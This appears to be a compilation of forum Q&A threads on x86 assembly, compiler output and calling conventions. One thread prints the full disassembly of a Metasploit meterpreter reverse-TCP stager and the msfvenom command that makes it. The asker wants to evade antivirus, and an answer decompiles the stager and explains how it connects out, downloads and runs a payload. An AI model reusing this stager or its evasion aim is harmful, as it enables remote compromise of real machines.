Why does GCC always generate mfence? - C++11

I am wondering why GCC 6.2 generates the following assembly output:
main:
push rbp
mov rbp, rsp
mov DWORD PTR [rbp-12], 0
mfence
mov DWORD PTR [rbp-8], 3
mfence
mov DWORD PTR [rbp-4], 2
mfence
mov eax, 0
pop rbp
ret
from this source:
#include <atomic>
int main(){
std::atomic_thread_fence(std::memory_order_relaxed); // why mfence instead of `nothing`?
std::atomic_thread_fence(std::memory_order_release); // why mfence instead of sfence?
std::atomic_thread_fence(std::memory_order_acquire); // why mfence instead of lfence?
return 0;
}
Specifically:
Why mfence instead of nothing?
Why mfence instead of sfence?
Why mfence instead of lfence?

Related

Performance difference between Rust and C++

I am currently learning Rust, and as a first exercise I wanted to implement a function that computes the nth Fibonacci number:
fn main() {
for i in 0..48 {
println!("{}: {}", i, fibonacci(i));
}
}
fn fibonacci(n: u32) -> u32 {
match n {
0 => 0,
1 => 1,
_ => fibonacci(n - 1) + fibonacci(n - 2),
}
}
I run it as:
$ time cargo run --release
real 0m15.380s
user 0m15.362s
sys 0m0.014s
As an exercise, I also implemented the same algorithm in C++. I was expecting similar performance, but the C++ code runs in 80% of the time:
#include<iostream>
unsigned int fibonacci(unsigned int n);
int main (int argc, char* argv[]) {
for(unsigned int i = 0; i < 48; ++i) {
std::cout << i << ": " << fibonacci(i) << '\n';
}
return 0;
}
unsigned int fibonacci(unsigned int n) {
if(n == 0) {
return 0;
} else if (n == 1) {
return 1;
} else {
return fibonacci(n - 1) + fibonacci(n - 2);
}
}
Compiled as:
$ g++ test.cpp -o test.exe -O2
And running:
$ time ./test.exe
real 0m12.127s
user 0m12.124s
sys 0m0.000s
Why do I see such a difference in performance? I am not interested in computing Fibonacci numbers faster in Rust (with a different algorithm); I am only interested in where the difference comes from. This is just an exercise in my progress as I learn Rust.
TL;DR: It's not Rust vs C++, it's LLVM (Clang) vs GCC.
Different optimizers optimize the code differently, and in this case GCC produces larger but faster code.
This can be verified using godbolt.
Here is the Rust version, compiled with GCC (via rustgcc-master):
example::fibonacci:
push r15
push r14
push r13
push r12
push rbp
xor ebp, ebp
push rbx
mov ebx, edi
sub rsp, 24
.L2:
test ebx, ebx
je .L1
cmp ebx, 1
je .L4
lea r12d, -1[rbx]
xor r13d, r13d
.L19:
cmp r12d, 1
je .L6
lea r14d, -1[r12]
xor r15d, r15d
.L16:
cmp r14d, 1
je .L8
lea edx, -1[r14]
xor ecx, ecx
.L13:
cmp edx, 1
je .L10
lea edi, -1[rdx]
mov DWORD PTR 12[rsp], ecx
mov DWORD PTR 8[rsp], edx
call example::fibonacci.localalias
mov ecx, DWORD PTR 12[rsp]
mov edx, DWORD PTR 8[rsp]
add ecx, eax
sub edx, 2
jne .L13
.L14:
add r15d, ecx
sub r14d, 2
je .L17
jmp .L16
.L4:
add ebp, 1
.L1:
add rsp, 24
mov eax, ebp
pop rbx
pop rbp
pop r12
pop r13
pop r14
pop r15
ret
.L6:
add r13d, 1
.L20:
sub ebx, 2
add ebp, r13d
jmp .L2
.L8:
add r15d, 1
.L17:
add r13d, r15d
sub r12d, 2
je .L20
jmp .L19
.L10:
add ecx, 1
jmp .L14
And with LLVM (via rustc):
example::fibonacci:
push rbp
push r14
push rbx
mov ebx, edi
xor ebp, ebp
mov r14, qword ptr [rip + example::fibonacci@GOTPCREL]
cmp ebx, 2
jb .LBB0_3
.LBB0_2:
lea edi, [rbx - 1]
call r14
add ebp, eax
add ebx, -2
cmp ebx, 2
jae .LBB0_2
.LBB0_3:
add ebx, ebp
mov eax, ebx
pop rbx
pop r14
pop rbp
ret
We can see that LLVM produces a naive version -- calling the function in each iteration of the loop -- while GCC partially unrolls the recursion by inlining some calls. This results in far fewer calls in the GCC case, and at roughly 5 ns of overhead per function call, that is significant.
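As a rough illustration, here is a hand-written C++ sketch (my own code, not actual compiler output) of the shape both backends give the function: the fibonacci(n - 2) call is turned into a loop, so only fibonacci(n - 1) survives as a real call. The four nested loops in the GCC listing (.L2, .L19, .L16, .L13) suggest GCC additionally inlines that remaining call several levels deep, which is where the extra speed comes from:
unsigned int fibonacci_shape(unsigned int n) {
    unsigned int acc = 0;
    while (n >= 2) {
        acc += fibonacci_shape(n - 1); // the one remaining real call
        n -= 2;                        // fibonacci(n - 2) became this loop step
    }
    return acc + n;                    // n is now 0 or 1: the base cases
}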
We can do the same exercise with the C++ version using LLVM (via Clang) and GCC, and note that the results are much the same.
So, as announced, it's an LLVM vs GCC difference, not a language one.
Incidentally, the fact that optimizers may produce such widely different results is a reason why I am quite excited about the progress of the rustc_codegen_gcc initiative (dubbed rustgcc-master on godbolt), which aims at plugging a GCC backend into the rustc frontend: once complete, anyone will be able to switch to the better optimizer for their own workload.

Segmentation fault after function call in x86 assembly

I'm currently writing a compiler. I have created some tests, and only one of them fails, with Segmentation fault (core dumped) as the error message.
This is the code that gets compiled:
function main(): int {
var f: int = 10;
return func(f) - func(f / 2);
}
function func(a: int): int {
return a;
}
And this is the generated assembly code (it's not really optimized, as you can see):
section .text
global _start
_start:
call function_main
mov rdi, rax
mov rax, 60
syscall
global function_main
function_main:
push rbp
mov rbp, rsp
sub rsp, 4
mov rax, 10
mov DWORD[rbp-0], eax
mov eax, DWORD[rbp-0]
mov rdi, rax
call function_func
push rax
mov eax, DWORD[rbp-0]
mov rbx, 2
idiv rbx
mov rdi, rax
call function_func
mov rbx, rax
pop rax
sub rax, rbx
mov rsp, rbp
pop rbp
ret
global function_func
function_func:
push rbp
mov rbp, rsp
sub rsp, 4
mov DWORD[rbp-0], edi
mov eax, DWORD[rbp-0]
mov rsp, rbp
pop rbp
ret
The assembly file is assembled with nasm -f elf64 ./test9.lv.asm -o ./test9.lv.asm.o and linked with ld -g ./test9.lv.asm.o -o a.out.
I've used gdb to debug the binary, and it seems like the program receives the SIGSEGV signal right after the first call to func(f) returns.
But I don't know why this is happening in this case.

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using Metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my Windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (in the hope of evading my AVs).
To test my workflow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my Windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong?
Your shellcode, converted to C/C++, is the following:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times to connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0); // !! an error in the shellcode, or deliberately damaged?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// MEM_RELEASE must be used to free the memory, but the code uses MEM_DECOMMIT.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
I tested it under a debugger and it worked. If something does not work for you, debug it; in particular, put a breakpoint on jmp rax. The beginning of the shellcode is a function which searches for an exported API (by hash) and calls it (jmp rax).
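For reference, here is a C++ sketch of the hash loop at third_jmp (my own reconstruction; the name ror13_hash is mine). It is the classic ROR-13 hash over an exported function's name, and the loop body also runs for the terminating NUL byte:
#include <cstdint>
uint32_t ror13_hash(const char* name) {
    uint32_t h = 0;
    uint8_t c;
    do {
        c = (uint8_t)*name++;      // lodsb
        h = (h >> 13) | (h << 19); // ror r9d, 0xd
        h += c;                    // add r9d, eax
    } while (c != 0);              // cmp al, ah / jnz third_jmp (ah is 0)
    return h;
}
The r10d constants loaded before each call rbp (for example 0x726774c, 0x6b8029) are precomputed module-plus-function hashes; the stub adds the module hash saved on the stack (add r9,[rsp+0x8]) before comparing at cmp r9d,r10d.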

What is the reason for this x86 calling convention?

I was trying to reduce the clutter in my original question (below), but I am afraid that made it harder to follow. So here is the original source along with IDA's disassembly.
My question still is this: why does getStruct() pop the return argument, and only the return argument, off the stack? (It ends with ret 4 instead of ret for no arguments or ret 12 for all three arguments.)
#include <iostream>
#include <cstdint>
struct SomeStruct {
char m_buff[0x1000];
};
SomeStruct getStruct(uint32_t someArg1, uint32_t someArg2)
{
return SomeStruct();
}
int main(int argc, const char * argv[])
{
SomeStruct myLocalStruct = getStruct(0x20,0x30);
return 0;
}
; _DWORD __stdcall getStruct(unsigned int, unsigned int)
public getStruct(unsigned int, unsigned int)
getStruct(unsigned int, unsigned int) proc near ; CODE XREF: _main+4Dp
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ebp+var_4], ecx
mov [ebp+var_8], eax
mov eax, esp
mov [eax], edx
mov dword ptr [eax+4], 1000h
call ___bzero
add esp, 18h
pop ebp
retn 4
getStruct(unsigned int, unsigned int) endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl main(int argc, const char **argv, const char **envp)
public _main
_main proc near
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
argc = dword ptr 8
argv = dword ptr 0Ch
envp = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
sub esp, 1030h
mov eax, [ebp+argv]
mov ecx, [ebp+argc]
lea edx, [ebp+var_1018]
mov esi, 20h
mov edi, 30h
mov [ebp+var_C], 0
mov [ebp+var_10], ecx
mov [ebp+var_14], eax
mov [esp], edx ; ptr to destination
mov dword ptr [esp+4], 20h ; unsigned int
mov dword ptr [esp+8], 30h
mov [ebp+var_101C], esi
mov [ebp+var_1020], edi
call getStruct(uint,uint)
sub esp, 4
mov eax, 0
add esp, 1030h
pop esi
pop edi
pop ebp
retn
_main endp
Original question below:
I have some function with the following declaration:
SomeStruct getStruct(uint32_t someArg1, uint32_t someArg2);
getStruct is being called like this:
myLocalStruct = getStruct(someArg1,someArg2);
When compiling this using clang on x86 the calling code looks roughly like this:
lea esi, [ebp-myLocalStructOffset]
mov [esp], esi
mov [esp+4], someArg1
mov [esp+8], someArg2
call getStruct;
sub esp, 4;
So the caller is restoring its stack pointer after the call. Sure enough, the implementation of getStruct ends with a ret 4, effectively popping the struct's pointer.
This looks like it is partially cdecl, with the caller being responsible for the stack cleanup, and partially stdcall, with the callee removing the arguments. I just cannot figure out the reason for this approach. Why not leave all the cleanup to the caller? Is there any benefit to this?
It looks as if you forgot to include the few lines of assembler above the part you quoted. I assume there is something like:
sub esp,12
somewhere above what you quoted. The calling convention looks like pure stdcall, and the return value is in reality passed as a hidden pointer argument, i.e. the code is in fact compiled as if you had declared:
void __stdcall getStruct(SomeStruct *returnValue, uint32_t someArg1, uint32_t someArg2);
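To make the lowering concrete, here is a hand-written C++ sketch (my own illustration; getStruct_lowered is a hypothetical name, not something the compiler emits):
struct SomeStruct { char m_buff[0x1000]; };

// hypothetical lowered form: the 4 KiB result is written through the
// hidden pointer, which is what the ___bzero call above implements
void getStruct_lowered(SomeStruct* result, unsigned int someArg1, unsigned int someArg2) {
    for (char& c : result->m_buff) c = 0;
}

int main() {
    SomeStruct myLocalStruct;
    // SomeStruct myLocalStruct = getStruct(0x20, 0x30); becomes:
    getStruct_lowered(&myLocalStruct, 0x20, 0x30);
    return 0;
}
The struct's address is the extra argument visible as arg_0 in the IDA listing above: it is the pointer that getStruct hands to ___bzero as the destination.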

gcc cdecl calling convention

I am testing the cdecl calling convention, but I am a little confused about the following.
Original C code:
int __attribute__((cdecl)) add(int a,int b)
{
int i;
i = a+b;
return i;
}
void __attribute__((cdecl)) print(int i, ...)
{
int j,a,b;
a = 2;
b = 3;
j = add(a,b);
}
void __attribute__((cdecl)) main(void)
{
print(2,3);
}
I compile the code with:
gcc test3.c -o test3 -g -mrtd
The corresponding asm looks like this:
(gdb) disassemble print
Dump of assembler code for function print:
0x080483cb <+0>: push ebp
0x080483cc <+1>: mov ebp,esp
0x080483ce <+3>: sub esp,0x18
0x080483d1 <+6>: mov DWORD PTR [ebp-0x8],0x2
0x080483d8 <+13>: mov DWORD PTR [ebp-0xc],0x3
0x080483df <+20>: mov eax,DWORD PTR [ebp-0xc]
0x080483e2 <+23>: mov DWORD PTR [esp+0x4],eax
0x080483e6 <+27>: mov eax,DWORD PTR [ebp-0x8]
0x080483e9 <+30>: mov DWORD PTR [esp],eax
0x080483ec <+33>: call 0x80483b4 <add>
0x080483f1 <+38>: mov DWORD PTR [ebp-0x4],eax
0x080483f4 <+41>: leave
0x080483f5 <+42>: ret
(gdb) disassemble add
Dump of assembler code for function add:
0x080483b4 <+0>: push ebp
0x080483b5 <+1>: mov ebp,esp
0x080483b7 <+3>: sub esp,0x10
0x080483ba <+6>: mov eax,DWORD PTR [ebp+0xc]
0x080483bd <+9>: mov edx,DWORD PTR [ebp+0x8]
0x080483c0 <+12>: lea eax,[edx+eax*1]
0x080483c3 <+15>: mov DWORD PTR [ebp-0x4],eax
0x080483c6 <+18>: mov eax,DWORD PTR [ebp-0x4]
0x080483c9 <+21>: leave
0x080483ca <+22>: ret
(gdb) disassemble main
Dump of assembler code for function main:
0x080483f6 <+0>: push ebp
0x080483f7 <+1>: mov ebp,esp
0x080483f9 <+3>: sub esp,0x8
0x080483fc <+6>: mov DWORD PTR [esp+0x4],0x3
0x08048404 <+14>: mov DWORD PTR [esp],0x2
0x0804840b <+21>: call 0x80483cb <print>
0x08048410 <+26>: leave
0x08048411 <+27>: ret
Under the cdecl convention I expected an instruction like add esp, 8 (or something similar) after the function call, but none was added.
Why is this? Thank you.
The code uses the leave instruction, which restores the stack frame: leave is equivalent to mov esp, ebp followed by pop ebp. Note also that gcc reserves the space for outgoing arguments once, in the prologue (sub esp, 0x8), and writes the arguments with mov rather than push, so there is nothing to pop after each individual call; leave releases the whole frame, argument area included. Therefore there is no need to adjust the stack pointer separately.
